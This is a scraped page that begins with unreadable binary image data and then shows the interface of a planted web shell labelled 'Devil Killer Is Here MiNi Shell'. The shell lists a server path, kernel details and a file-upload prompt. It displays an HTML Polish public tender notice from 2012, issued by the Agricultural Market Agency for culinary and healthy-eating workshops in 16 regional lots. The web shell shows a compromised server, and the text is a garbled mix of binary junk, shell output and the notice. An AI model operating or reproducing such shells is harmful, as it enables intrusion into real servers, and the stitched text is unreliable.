JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120330/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120330/100714-N-2012.html

<p class="kh_header"><b>Warszawa: Przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych dotyczących produktów regionalnych, tradycyjnych i ekologicznych oraz zasad zdrowego żywienia</b><br>
<b>Numer ogłoszenia: 100714 - 2012; data zamieszczenia: 30.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Rynku Rolnego , ul. Nowy Świat 6/12, 00-400 Warszawa, woj. mazowieckie, tel. 22 6617272, faks 22 661 73 79.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.arr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych dotyczących produktów regionalnych, tradycyjnych i ekologicznych oraz zasad zdrowego żywienia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych dotyczących produktów regionalnych, tradycyjnych 
i ekologicznych oraz zasad zdrowego żywienia.
2. Szczegółowy opis przedmiotu zamówienia, odpowiednio dla każdej części znajduje się w Istotnych Postanowieniach Umowy (IPU), w dokumencie Wytyczne i Harmonogram (załączniki od nr 2 do IPU).
Podział na zadania częściowe wraz z przyporządkowaniem do Oddziałów Terenowych ARR:
1) zadanie częściowe nr 1: Oddział Terenowy ARR Białystok;
2) zadanie częściowe nr 2: Oddział Terenowy ARR Białystok;
3) zadanie częściowe nr 3: Oddział Terenowy ARR Warszawa;
4) zadanie częściowe nr 4: Oddział Terenowy ARR Bydgoszcz;
5) zadanie częściowe nr 5: Oddział Terenowy ARR Kraków;
6) zadanie częściowe nr 6: Oddział Terenowy ARR Opole;
7) zadanie częściowe nr 7: Oddział Terenowy ARR Poznań;
8) zadanie częściowe nr 8: Oddział Terenowy ARR Olsztyn;
9) zadanie częściowe nr 9: Oddział Terenowy ARR Wrocław;
10) zadanie częściowe nr 10: Oddział Terenowy ARR Gdynia;
11) zadanie częściowe nr 11: Oddział Terenowy ARR Gorzów Wielkopolski;
12) zadanie częściowe nr 12: Oddział Terenowy ARR Gorzów Wielkopolski;
13) zadanie częściowe nr 13: Oddział Terenowy ARR Gorzów Wielkopolski;
14) zadanie częściowe nr 14: Oddział Terenowy ARR Lublin;
15) zadanie częściowe nr 15: Oddział Terenowy ARR Lublin;
16) zadanie częściowe nr 16: Oddział Terenowy ARR Kielce..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 16.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W zadaniu częściowym nr 1 (Oddział Terenowy ARR Białystok), Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum 1 usługę tożsamą z przedmiotem zamówienia (tj. polegającą na prowadzeniu podobnego typu warsztatów kulinarnych) o wartości 3.000,00 (słownie: trzy tysiące) PLN brutto;
2. W zadaniu częściowym nr 2 (Oddział Terenowy ARR Białystok), Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum 1 usługę tożsamą z przedmiotem zamówienia (tj. polegającą na prowadzeniu podobnego typu warsztatów kulinarnych) o wartości 500,00 (słownie: pięćset) PLN brutto;
3. W zadaniu częściowym nr 3 (Oddział Terenowy ARR Warszawa), Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum 1 usługę tożsamą z przedmiotem zamówienia (tj. polegającą na prowadzeniu podobnego typu warsztatów kulinarnych) o wartości 1.000,00 (słownie: jeden tysiąc) PLN brutto;
4. W zadaniu częściowym nr 4 (Oddział Terenowy ARR Bydgoszcz), Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum 1 usługę tożsamą z przedmiotem zamówienia (tj. polegającą na prowadzeniu podobnego typu warsztatów kulinarnych) o wartości 3.000,00 (słownie: trzy tysiące) PLN brutto;
5. W zadaniu częściowym nr 5 (Oddział Terenowy ARR Kraków), Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum 1 usługę tożsamą z przedmiotem zamówienia (tj. polegającą na prowadzeniu podobnego typu warsztatów kulinarnych) o wartości 1.000,00 (słownie: jeden tysiąc) PLN brutto;
6. W zadaniu częściowym nr 6 (Oddział Terenowy ARR Opole), Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum 1 usługę tożsamą z przedmiotem zamówienia (tj. polegającą na prowadzeniu podobnego typu warsztatów kulinarnych) o wartości 1.000,00 (słownie: jeden tysiąc) PLN brutto;
7. W zadaniu częściowym nr 7 (Oddział Terenowy ARR Poznań), Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum 1 usługę tożsamą z przedmiotem zamówienia (tj. polegającą na prowadzeniu podobnego typu warsztatów kulinarnych) o wartości 500,00 (słownie: pięćset) PLN brutto;
8. W zadaniu częściowym nr 8 (Oddział Terenowy ARR Olsztyn), Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum 1 usługę tożsamą z przedmiotem zamówienia (tj. polegającą na prowadzeniu podobnego typu pokazów kulinarnych) o wartości 2.000,00 (słownie: dwa tysiące) PLN brutto;
9. W zadaniu częściowym nr 9 (Oddział Terenowy ARR Wrocław), Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum 1 usługę tożsamą z przedmiotem zamówienia (tj. polegającą na prowadzeniu podobnego typu warsztatów kulinarnych) o wartości 3.000,00 (słownie: trzy tysiące) PLN brutto;
10. W zadaniu częściowym nr 10 (Oddział Terenowy ARR Gdynia), Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum 1 usługę tożsamą z przedmiotem zamówienia (tj. polegającą na prowadzeniu podobnego typu warsztatów kulinarnych) o wartości 3.000,00 (słownie: trzy tysiące) PLN brutto;
11. W zadaniu częściowym nr 11 (Oddział Terenowy ARR Gorzów Wielkopolski), Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum 1 usługę tożsamą z przedmiotem zamówienia (tj. polegającą na prowadzeniu podobnego typu warsztatów kulinarnych) o wartości 1.000,00 (słownie: jeden tysiąc) PLN brutto;
12. W zadaniu częściowym nr 12 (Oddział Terenowy ARR Gorzów Wielkopolski), Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum 1 usługę tożsamą z przedmiotem zamówienia (tj. polegającą na prowadzeniu podobnego typu warsztatów kulinarnych) o wartości 500,00 (słownie: pięćset) PLN brutto;
13. W zadaniu częściowym nr 13 (Oddział Terenowy ARR Gorzów Wielkopolski), Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum 1 usługę tożsamą z przedmiotem zamówienia (tj. polegającą na prowadzeniu podobnego typu warsztatów kulinarnych) o wartości 1.000,00 (słownie: jeden tysiąc) PLN brutto;
14. W zadaniu częściowym nr 14 (Oddział Terenowy ARR Lublin), Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum 1 usługę tożsamą z przedmiotem zamówienia (tj. polegającą na prowadzeniu podobnego typu warsztatów kulinarnych) o wartości 2.000,00 (słownie: dwa tysiące) PLN brutto;
15. W zadaniu częściowym nr 15 (Oddział Terenowy ARR Lublin), Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum 1 usługę tożsamą z przedmiotem zamówienia (tj. polegającą na prowadzeniu podobnego typu warsztatów kulinarnych) o wartości 500,00 (słownie: pięćset) PLN brutto;
16. W zadaniu częściowym nr 16 (Oddział Terenowy ARR Kielce), Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum 1 usługę tożsamą z przedmiotem zamówienia (tj. polegającą na prowadzeniu podobnego typu warsztatów kulinarnych) o wartości 3.000,00 (słownie: trzy tysiące) PLN brutto;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W zadaniu częściowym nr 1 (Oddział Terenowy ARR Białystok), Wykonawca dysponuje przynajmniej jedną osobą, która posiada uprawnienia pedagogiczne np. kurs pedagogiczny;
2. W zadaniu częściowym nr 4 (Oddział Terenowy ARR Bydgoszcz), Wykonawca dysponuje przynajmniej jedną osobą, która posiada:
- dyplom mistrzowski w zawodzie kucharz wydany przez Cech Rzemieślniczy;
- uprawnienia pedagogiczne np. kurs pedagogiczny;
3. W zadaniu częściowym nr 5 (Oddział Terenowy ARR Kraków), Wykonawca dysponuje przynajmniej jedną osobą, która posiada:
- dyplom mistrzowski w zawodzie kucharz wydany przez Cech Rzemieślniczy;
- uprawnienia pedagogiczne np. kurs pedagogiczny;
4. W zadaniu częściowym nr 6 (Oddział Terenowy ARR Opole), Wykonawca dysponuje przynajmniej jedną osobą, która posiada uprawnienia pedagogiczne np. kurs pedagogiczny;
5. W zadaniu częściowym nr 7 (Oddział Terenowy ARR Poznań), Wykonawca dysponuje przynajmniej jedną osobą, która posiada:
- dyplom mistrzowski w zawodzie kucharz wydany przez Cech Rzemieślniczy;
- uprawnienia pedagogiczne np. kurs pedagogiczny;
6. W zadaniu częściowym nr 8 (Oddział Terenowy ARR Olsztyn), Wykonawca dysponuje przynajmniej jedną osobą, która posiada dyplom mistrzowski w zawodzie kucharz wydany przez Cech Rzemieślniczy;
7. W zadaniu częściowym nr 9 (Oddział Terenowy ARR Wrocław), Wykonawca dysponuje przynajmniej jedną osobą, która posiada:
- dyplom mistrzowski w zawodzie kucharz wydany przez Cech Rzemieślniczy;
- uprawnienia pedagogiczne np. kurs pedagogiczny;
8. W zadaniu częściowym nr 10 (Oddział Terenowy ARR Gdynia), Wykonawca dysponuje przynajmniej jedną osobą, która posiada dyplom mistrzowski w zawodzie kucharz wydany przez Cech Rzemieślniczy;
9. W zadaniu częściowym nr 11 (Oddział Terenowy ARR Gorzów Wielkopolski), Wykonawca dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe o kierunku gastronomicznym;
10. W zadaniu częściowym nr 12 (Oddział Terenowy ARR Gorzów Wielkopolski), Wykonawca dysponuje przynajmniej jedną osobą, która posiada dyplom mistrzowski w zawodzie kucharz wydany przez Cech Rzemieślniczy;
11. W zadaniu częściowym nr 13 (Oddział Terenowy ARR Gorzów Wielkopolski), Wykonawca dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe o kierunku gastronomicznym;
12. W zadaniu częściowym nr 14 (Oddział Terenowy ARR Lublin), Wykonawca dysponuje przynajmniej jedną osobą, która posiada uprawnienia pedagogiczne np. kurs pedagogiczny;
13. W zadaniu częściowym nr 15 (Oddział Terenowy ARR Lublin), Wykonawca dysponuje przynajmniej jedną osobą, która posiada uprawnienia pedagogiczne np. kurs pedagogiczny;
14. W zadaniu częściowym nr 16 (Oddział Terenowy ARR Kielce), Wykonawca dysponuje przynajmniej jedną osobą, która posiada dyplom mistrzowski 
w zawodzie kucharz wydany przez Cech Rzemieślniczy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się możliwość dokonania zmian istotnych postanowień umowy (IPU) w stosunku do treści oferty, na warunkach wskazanych w treści § 4 pkt 4. tj:
Zakres przedmiotu zamówienia, o którym mowa w § 2 pkt 1 IPU może ulec zmianie poprzez wydłużenie bądź skrócenie czasu świadczenia usługi itp. Co nie powoduje zmiany wynagrodzenia, określonego w § 4 pkt 1 IPU.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.arr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Rynku Rolnego, ul. Nowy Świat 6/12, 00-400 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.04.2012 godzina 12:00, miejsce: Agencja Rynku Rolnego w Warszawie, ul. Nowy Świat 6/12, Kancelaria Ogólna, hol główny, parter, wejście D/A.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych dotyczących produktów regionalnych, tradycyjnych 
i ekologicznych oraz zasad zdrowego żywienia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie częściowe nr 1: Oddział Terenowy ARR Białystok.
Przedmiotem zamówienia jest przeprowadzenie warsztatów i pokazów kulinarnych dotyczących produktów regionalnych, tradycyjnych i ekologicznych oraz zasad zdrowego żywienia. Celem warsztatów i pokazów kulinarnych jest zapoznanie z tajnikami kulinarnymi kuchni regionu podlaskiego oraz prezentacje i konsultacje nt. zasad zdrowego odżywiania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych dotyczących produktów regionalnych, tradycyjnych 
i ekologicznych oraz zasad zdrowego żywienia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie częściowe nr 2: Oddział Terenowy ARR Białystok.
Przedmiotem zamówienia jest przeprowadzenie warsztatów kulinarnych dotyczących kuchni supraskiej zawierającej elementy kuchni narodowościowych: żydowska, niemiecka, białoruska, tatarska, polska. Celem będzie pokazanie jak dawniej wyglądała i funkcjonowała kuchnia supraska, a w szczególności dostrzegalne w niej inspiracje kuchnią wielonarodowościową.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 02.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych dotyczących produktów regionalnych, tradycyjnych 
i ekologicznych oraz zasad zdrowego żywienia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie częściowe nr 3: Oddział Terenowy ARR Warszawa.
Przedmiotem zamówienia jest przeprowadzenie warsztatów kulinarnych wraz 
z pokazami kulinarnymi dotyczącymi produktów ekologicznych oraz zasad zdrowego żywienia. Zajęcia odbędą się w wybranym gospodarstwie ekologicznym. Zajęcia praktyczne połączone będą z prelekcjami dotyczącymi rolnictwa ekologicznego w Polsce i na świecie oraz jego znaczenia dla środowiska.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych dotyczących produktów regionalnych, tradycyjnych 
i ekologicznych oraz zasad zdrowego żywienia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie częściowe nr 4: Oddział Terenowy ARR Bydgoszcz.
Przedmiotem zamówienia jest przeprowadzenie warsztatów kulinarnych dotyczących produktów regionalnych, tradycyjnych i ekologicznych oraz zasad zdrowego żywienia. Celem warsztatów jest zapoznanie uczniów szkół gastronomicznych i rolniczych o profilu gastronomicznym ze sposobami oraz recepturami sporządzania potraw regionalnych i tradycyjnych z produktów ekologicznych oraz propagowanie zdrowych nawyków żywieniowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
